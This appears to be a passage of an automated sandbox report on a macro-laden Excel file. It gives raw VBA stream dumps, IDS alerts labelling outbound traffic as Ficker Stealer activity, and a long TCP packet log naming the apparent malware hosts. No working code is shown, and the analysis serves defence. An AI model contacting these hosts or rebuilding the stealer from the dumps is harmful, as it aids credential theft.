                                                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 463
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                File Type:ASCII text, with CRLF line terminators
                                                Stream Size:463
                                                Entropy:5.37464134487
                                                Base64 Encoded:True
                                                Data ASCII:I D = " { 5 9 C 6 5 7 D 9 - A 6 8 9 - 4 0 B 8 - 8 8 7 C - D 5 C B C A E 8 8 A 1 C } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 0 A 2 B 8 B E B C B E B C B E B C B E B C " . . D P B = " 7 9 7 B 6 1 9 2 6 2 9 2 6 2 9 2 " . . G C = " 5 2 5 0
                                                Data Raw:49 44 3d 22 7b 35 39 43 36 35 37 44 39 2d 41 36 38 39 2d 34 30 42 38 2d 38 38 37 43 2d 44 35 43 42 43 41 45 38 38 41 31 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d
                                                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 86
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                File Type:data
                                                Stream Size:86
                                                Entropy:3.24455457963
                                                Base64 Encoded:False
                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3274
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                File Type:data
                                                Stream Size:3274
                                                Entropy:4.47186467068
                                                Base64 Encoded:False
                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 3034
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                File Type:data
                                                Stream Size:3034
                                                Entropy:3.312414071
                                                Base64 Encoded:False
                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ , . . . . . . . . . . . . . . . " . . . . . . . . . . .
                                                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 381
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                File Type:data
                                                Stream Size:381
                                                Entropy:2.66347860718
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h w n d . . . . . . . . . . . . . . . . l p O p e r a t i o n . . . . . . . . . . . . . . . . l p F i l e . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 11 00 00 00 00 00 00 00 00 00 05 00 ff ff
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 2014
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                File Type:data
                                                Stream Size:2014
                                                Entropy:3.03300546518
                                                Base64 Encoded:False
                                                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . a . . . . . . . . . . . . . . . . .
                                                Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 03 00 02 00 17 00 00 00 f1 0e 00 00 00 00 00 00 00 00 00 00 81 11 00 00 00 00 00 00 00 00 00 00 71 13 00 00 00 00 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 342
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                File Type:data
                                                Stream Size:342
                                                Entropy:2.15826376963
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 80 00 00 00 08 00 78 00 b1 0a 00 00 00 00 00 00 00 00 00 00 00 00 03 70 18 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 367
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_4
                                                File Type:data
                                                Stream Size:367
                                                Entropy:1.33311181947
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 10 00 00 00 00 00 00 00 00 00 04 00 02 00 02 00 00 00 00 00 48 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 69 02
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 248
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_5
                                                File Type:data
                                                Stream Size:248
                                                Entropy:1.88677350926
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . P . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . P . . . . . . . b . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 40 00 f1 00 00 00 00 00 00 00 00 00 04 00 00 00 00 60 04 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 685
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                File Type:data
                                                Stream Size:685
                                                Entropy:6.38472401563
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                Data Raw:01 a9 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 e2 f1 ef 62 07 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                07/22/21-16:11:06.655970TCP2031074ET TROJAN Win32/Ficker Stealer Activity804917395.213.179.67192.168.2.22
                                                07/22/21-16:11:06.656427TCP2031132ET TROJAN Win32/Ficker Stealer Activity M34917380192.168.2.2295.213.179.67
                                                07/22/21-16:11:08.151878TCP2031074ET TROJAN Win32/Ficker Stealer Activity804917895.213.179.67192.168.2.22
                                                07/22/21-16:11:08.152290TCP2031132ET TROJAN Win32/Ficker Stealer Activity M34917880192.168.2.2295.213.179.67

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 22, 2021 16:11:03.422887087 CEST4916780192.168.2.2254.235.88.121
                                                Jul 22, 2021 16:11:03.588664055 CEST804916754.235.88.121192.168.2.22
                                                Jul 22, 2021 16:11:03.588781118 CEST4916780192.168.2.2254.235.88.121
                                                Jul 22, 2021 16:11:03.589586973 CEST4916780192.168.2.2254.235.88.121
                                                Jul 22, 2021 16:11:03.755573988 CEST804916754.235.88.121192.168.2.22
                                                Jul 22, 2021 16:11:03.760507107 CEST804916754.235.88.121192.168.2.22
                                                Jul 22, 2021 16:11:03.760660887 CEST4916780192.168.2.2254.235.88.121
                                                Jul 22, 2021 16:11:03.981133938 CEST4916880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:04.033448935 CEST8049168194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:04.033590078 CEST4916880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:04.034487963 CEST4916880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:04.086605072 CEST8049168194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:04.203983068 CEST8049168194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:04.204190969 CEST4916880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:04.377377987 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.432929993 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.433032990 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.434003115 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.496922970 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.616672993 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.616720915 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.616750002 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.616771936 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.616791964 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.616808891 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.616833925 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.616833925 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.616856098 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.616857052 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.616862059 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.616864920 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.616877079 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.616883993 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.616899014 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.616909027 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.616923094 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.617311954 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671677113 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671706915 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671730042 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671765089 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671775103 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671788931 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671797037 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671801090 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671811104 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671818018 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671833038 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671842098 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671854019 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671857119 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671875954 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671883106 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671896935 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671907902 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671917915 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671926022 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671942949 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671952009 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671964884 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.671968937 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671977043 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.671986103 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.672004938 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.672015905 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.672018051 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.672039986 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.672048092 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.672059059 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.672068119 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.672080040 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.672080994 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.672101021 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.672108889 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.672126055 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.672132969 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.672157049 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727066994 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727154970 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727196932 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727221012 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727229118 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727243900 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727247953 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727258921 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727273941 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727288008 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727303028 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727319956 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727324963 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727354050 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727396965 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727401972 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727477074 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727536917 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727550983 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727591038 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727612972 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727649927 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727703094 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727755070 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727772951 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727818966 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727838993 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727884054 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727901936 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.727943897 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.727961063 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728004932 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728022099 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728068113 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728091002 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728133917 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728153944 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728200912 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728215933 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728260040 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728272915 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728319883 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728352070 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728396893 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728415966 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728461027 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728707075 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728748083 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728775024 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728811979 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728832006 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728872061 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728893042 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.728940010 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.728957891 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729002953 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729024887 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729070902 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729072094 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729104996 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729110003 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729141951 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729146957 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729181051 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729187012 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729221106 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729224920 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729257107 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729269028 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729304075 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729309082 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729345083 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729346037 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729378939 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729383945 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729418993 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729423046 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729458094 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.729463100 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.729501963 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783242941 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783276081 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783298016 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783318996 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783344030 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783365965 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783369064 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783385992 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783386946 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783396959 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783409119 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783416033 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783432007 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783438921 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783454895 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783463001 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783476114 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783483028 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783497095 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783505917 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783523083 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783525944 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783545971 CEST80491698.211.241.0192.168.2.22
